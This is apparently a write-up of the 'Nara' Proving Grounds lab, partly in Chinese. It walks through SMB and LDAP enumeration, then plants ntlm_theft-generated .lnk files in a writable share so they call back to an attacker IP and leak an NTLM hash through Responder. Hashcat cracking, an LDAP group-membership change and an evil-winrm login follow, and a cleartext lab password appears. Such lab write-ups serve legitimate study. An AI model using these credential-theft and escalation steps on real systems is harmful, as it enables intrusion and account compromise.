Difficulty

easy

Scan

53 dig axfr

dig AXFR -p 53 @192.168.178.30
;; communications error to 192.168.178.30#53: timed out

; <<>> DiG 9.20.2-1-Debian <<>> AXFR -p 53 @192.168.178.30
; (1 server found)
;; global options: +cmd
;; Query time: 4718 msec
;; SERVER: 192.168.178.30#53(192.168.178.30) (UDP)
;; WHEN: Sat Mar 15 09:20:53 CST 2025
;; MSG SIZE  rcvd: 28

ldapsearch

ldapsearch -H ldap://192.168.178.30 -x -b "DC=nara-security,DC=com" |tee ldap_dump
# extended LDIF
#
# LDAPv3
# base <DC=nara-security,DC=com> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090AC9, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1

smbclient

smbclient -L //192.168.178.30 -N

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nara            Disk      company share
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
^[[AReconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.178.30 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

get Important.txt

smbclient //192.168.178.30/nara -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 30 22:31:58 2023
  ..                                DHS        0  Sat Mar 15 09:18:08 2025
  Documents                           D        0  Sun Jul 30 22:03:13 2023
  Important.txt                       A     2200  Sun Jul 30 22:05:31 2023
  IT                                  D        0  Mon Jul 31 00:22:50 2023

                7699711 blocks of size 4096. 4153067 blocks available
smb: \> get Important.txt 
getting file \Important.txt of size 2200 as Important.txt (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
smb: \> cd Documents\
lssmb: \Documents\> ls
  .                                   D        0  Sun Jul 30 22:03:13 2023
  ..                                  D        0  Sun Jul 30 22:31:58 2023

                7699711 blocks of size 4096. 4152768 blocks available
smb: \Documents\> cd ..
smb: \> cd IT
smb: \IT\> ls
  .                                   D        0  Mon Jul 31 00:22:50 2023
  ..                                  D        0  Sun Jul 30 22:31:58 2023

                7699711 blocks of size 4096. 4152768 blocks available
smb: \IT\> exit

提示员工要经常检查shared documents下的文件

cat Important.txt 
Dear Team,

We hope this message finds you well. We wanted to remind all employees to take a moment each day to check the shared documents folder diligently. As part of our commitment to streamline processes and enhance efficiency, important documents are frequently uploaded to this folder for your attention and action.

The shared documents folder serves as a central hub for crucial updates, contracts, agreements, and various other essential materials requiring your attention. To ensure that you don't miss any critical information, please make it a habit to access the folder at the beginning of your workday or as often as possible.

Here are a few simple steps to stay up-to-date and ensure timely actions:

* Access the Shared Documents Folder: Log in to your company account and navigate to the designated shared documents folder. If you encounter any issues accessing the folder, please reach out to the IT department for assistance.

* Review New Additions: Look for any new documents that might have been uploaded since your last visit. These documents might require your signature, feedback, or acknowledgment.

* Take Action Promptly: If there are documents that need your attention, please act promptly and follow the necessary procedures as indicated within each document. Whether it's a signature, a comment, or any other form of response, timely actions are vital to keep our operations running smoothly.

* Seek Clarification: If you encounter any uncertainty or have questions about the documents you find, don't hesitate to reach out to the relevant department or the person mentioned in the document for clarification. It's essential that you fully understand what's required before proceeding.

Remember, staying informed and acting promptly ensures that projects progress seamlessly, contracts get executed on time, and the company as a whole operates efficiently. Your cooperation in this matter is greatly appreciated and contributes to our collective success.

Thank you for your attention to this matter, and if you have any concerns or suggestions to improve our document management process, please share them with your department head or the HR team.

Foothold

smb html steal

smbclient put test.txt 发现有上传文件权限, 使用ntlm-theft.py生成 lnk文件，上传到documents文件夹下，等待倒霉蛋点击执行

python3 ntlm_theft.py -g all -s 192.168.45.241 -f test
Created: test/test.scf (BROWSE TO FOLDER)
Created: test/test-(url).url (BROWSE TO FOLDER)
Created: test/test-(icon).url (BROWSE TO FOLDER)
Created: test/test.lnk (BROWSE TO FOLDER)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test-(externalcell).xlsx (OPEN)
Created: test/test.wax (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: test/Autorun.inf (BROWSE TO FOLDER)
Created: test/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

smb: \> cd Documents\
smb: \Documents\> put test.lnk 
putting file test.lnk as \Documents\test.lnk (3.8 kb/s) (average 1.7 kb/s)
smb: \Documents\> ls
  .                                   D        0  Sat Mar 15 13:48:09 2025
  ..                                  D        0  Sat Mar 15 13:42:07 2025
  test.lnk                            A     2164  Sat Mar 15 13:48:10 2025

                7699711 blocks of size 4096. 3506757 blocks available

kali 启动 responder, 稍等片刻获取到Tracy.White的ntlm hash

使用hashcat破解 hashcat white.hash /usr/share/wordlists/rockyou.txt

使用用户名密码发现winrm、rdp都无法登录

bloodhound

接下来利用bloodhound-python看下有没有可以利用的点

1	bloodhound-python -dns-tcp -ns 192.168.178.30 -d nara-security.com -u Tracy.White -p zqwj041FGX -c all

把所有json文件导入bloodhound中，看看White拥有什么权限

对remote access有完全控制权，按照利用方式，没有成功，

ladpmodify

cat groupadd.ldif 
dn: CN=Remote Access,OU=remote,DC=nara-security,DC=com
changetype: modify
add: member
member: CN=Tracy White,OU=staff,DC=nara-security,DC=com

ldapmodify -x -D "``[email protected]``" -w zqwj041FGX -H ldap://``nara-security.com -f groupadd.ldif

接下来使用evil-winrm登录,

evil-winrm -i 192.168.178.30 -u "Tracy.White" -p "zqwj041FGX"
*Evil-WinRM* PS C:\Users\tracy.white\Documents> whoami
narasec\tracy.white

*Evil-WinRM* PS C:\Users\tracy.white\Documents> ls
    Directory: C:\Users\tracy.white\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/30/2023   3:05 PM            373 automation.txt

*Evil-WinRM* PS C:\Users\tracy.white\Documents> cat automation.txt
Enrollment Automation Account

01000000d08c9ddf0115d1118c7a00c04fc297eb0100000001e86ea0aa8c1e44ab231fbc46887c3a0000000002000000000003660000c000000010000000fc73b7bdae90b8b2526ada95774376ea0000000004800000a000000010000000b7a07aa1e5dc859485070026f64dc7a720000000b428e697d96a87698d170c47cd2fc676bdbd639d2503f9b8c46dfc3df4863a4314000000800204e38291e91f37bd84a3ddb0d6f97f9eea2b

Nice Walkthrough

https://hackmd.io/@Abzee/Nara?utm_source=preview-mode&utm_medium=rec

临渊羡鱼

Proving Grounds Practice - Nara